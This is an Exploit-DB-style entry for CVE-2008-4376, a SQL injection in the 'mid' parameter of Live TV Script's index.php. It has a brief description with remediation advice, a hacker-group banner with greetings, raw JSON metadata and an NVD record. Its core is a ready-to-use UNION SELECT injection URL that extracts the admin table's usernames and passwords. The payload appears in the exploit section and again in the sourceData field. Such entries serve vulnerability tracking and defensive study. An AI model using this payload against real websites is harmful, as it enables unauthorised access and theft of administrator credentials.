ID EDB-ID:6404
Type exploitdb
Reporter InjEctOr5
Modified 2008-09-09T00:00:00
Description
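Live TV Script (index.php mid) SQL Injection Vulnerability. CVE-2008-4376. Webapps exploit for the PHP platform. The `mid` request parameter of index.php reaches a SQL query without sanitization (CWE-89), so a remote, unauthenticated client can alter the query; the proof of concept below shows this by reading the `uid` and `pwd` columns of the `admin` table through a UNION SELECT. No fixed version is named in this entry. For defenders: bind `mid` as a prepared-statement parameter or cast it to an integer before it is used, and treat index.php requests whose `mid` value is not purely numeric as an indicator worth alerting on.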
|| || | ||
o_,_7 _|| . _o_7 _|| 4_|_|| o_w_,
( : / (_) / ( .
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
| _ __ __ __ ______ |
| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ |
| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ |
| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ |
| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ |
| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ |
| \ \____/ >> Kings of injection |
| \/___/ |
| |
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
<<!>> Found by : Cyb3r-1sT
<<!>> C0ntact : cyb3r-1st [at] hotmail.com
<<!>> Groups : InjEctOr5 T3am
=======================================================
++++++++++++++++++++ Script information++++++++++++++++++++++
=======================================================
<<->> script : live-tv-script
<<->> script site : www.livetvscript.com
=======================================================
++++++++++++++++++++++++ Exploit +++++++++++++++++++++++++
=======================================================
<<->> D0rk : find it
<<->> Exploit :>>>
>>>> www.site.me/patch/index.php?mid=-99999+union+select+0,unhex(hex(concat(uid,0x3a,pwd))),0,0+from+admin/*
=======================================================
+++++++++++++++++++++++ Greetz ++++++++++++++++++++++++
=======================================================
<<->> freinds :: titanichacker $ arb-hawk $ denm0 $ drbaka $ nicehacker
anaconda-ksa $ sirus $ br1ght-dark $ Golden-zero $ crazy-x
<<->> InjEctOr5 TeaM freinds :: abo-najm $ Eng.Silent Night $ spid3r-net $ hacker-b0y $ qalbhamad $ Mr.Dangers - RooT-HacKer - 07 - fisher - ToTal
<<->> All muslims
# milw0rm.com [2008-09-09]
{"id": "EDB-ID:6404", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Live TV Script index.php mid SQL Injection Vulnerability", "description": "Live TV Script (index.php mid) SQL Injection Vulnerability. CVE-2008-4376. Webapps exploit for php platform", "published": "2008-09-09T00:00:00", "modified": "2008-09-09T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/6404/", "reporter": "InjEctOr5", "references": [], "cvelist": ["CVE-2008-4376"], "lastseen": "2016-01-31T23:48:23", "viewCount": 9, "enchantments": {"score": {"value": 6.5, "vector": "NONE", "modified": "2016-01-31T23:48:23", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-4376"]}], "modified": "2016-01-31T23:48:23", "rev": 2}, "vulnersScore": 6.5}, "sourceHref": "https://www.exploit-db.com/download/6404/", "sourceData": "\n || || | || \n o_,_7 _|| . _o_7 _|| 4_|_|| o_w_, \n ( : / (_) / ( . 
\n|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|\n| _ __ __ __ ______ |\n| /' \\ __ /'__`\\ /\\ \\__ /'__`\\ /\\ ___\\ |\n| /\\_, \\ ___ /\\_\\/\\_\\L\\ \\ ___\\ \\ ,_\\/\\ \\/\\ \\ _ __\\ \\ \\__/ |\n| \\/_/\\ \\ /' _ `\\ \\/\\ \\/_/_\\_<_ /'___\\ \\ \\/\\ \\ \\ \\ \\/\\`'__\\ \\___``\\ |\n| \\ \\ \\/\\ \\/\\ \\ \\ \\ \\/\\ \\L\\ \\/\\ \\__/\\ \\ \\_\\ \\ \\_\\ \\ \\ \\/ \\/\\ \\L\\ \\ |\n| \\ \\_\\ \\_\\ \\_\\_\\ \\ \\ \\____/\\ \\____\\\\ \\__\\\\ \\____/\\ \\_\\ \\ \\____/ |\n| \\/_/\\/_/\\/_/\\ \\_\\ \\/___/ \\/____/ \\/__/ \\/___/ \\/_/ \\/___/ |\n| \\ \\____/ >> Kings of injection |\n| \\/___/ |\n| |\n|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|\n\n\n<<!>> Found by : Cyb3r-1sT\n\n<<!>> C0ntact : cyb3r-1st [at] hotmail.com \n \n<<!>> Groups : InjEctOr5 T3am \n\n\n=======================================================\n++++++++++++++++++++ Script information++++++++++++++++++++++\n=======================================================\n\n\n<<->> script : live-tv-script\n\n<<->> script site : www.livetvscript.com \n\n\n\n=======================================================\n++++++++++++++++++++++++ Exploit +++++++++++++++++++++++++\n=======================================================\n\n\n<<->> D0rk : find it\n\n<<->> Exploit :>>>\n\n >>>> www.site.me/patch/index.php?mid=-99999+union+select+0,unhex(hex(concat(uid,0x3a,pwd))),0,0+from+admin/*\n\n\n=======================================================\n+++++++++++++++++++++++ Greetz ++++++++++++++++++++++++\n=======================================================\n\n\n<<->> freinds :: titanichacker $ arb-hawk $ denm0 $ drbaka $ nicehacker \n anaconda-ksa $ sirus $ br1ght-dark $ Golden-zero $ crazy-x \n \n\n<<->> InjEctOr5 TeaM freinds :: abo-najm $ Eng.Silent Night $ spid3r-net $ hacker-b0y $ qalbhamad $ Mr.Dangers - RooT-HacKer - 07 - fisher - ToTal\n\n\n\n<<->> All muslims\n\n# milw0rm.com [2008-09-09]\n", "osvdbidlist": ["47981"], 
"immutableFields": []}
{"cve": [{"lastseen": "2021-02-02T05:35:17", "description": "SQL injection vulnerability in index.php in Live TV Script allows remote attackers to execute arbitrary SQL commands via the mid parameter.", "edition": 4, "cvss3": {}, "published": "2008-10-01T15:38:00", "title": "CVE-2008-4376", "type": "cve", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-4376"], "modified": "2017-09-29T01:32:00", "cpe": ["cpe:/a:livetvscript:live_tv_script:*"], "id": "CVE-2008-4376", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4376", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:livetvscript:live_tv_script:*:*:*:*:*:*:*:*"]}]}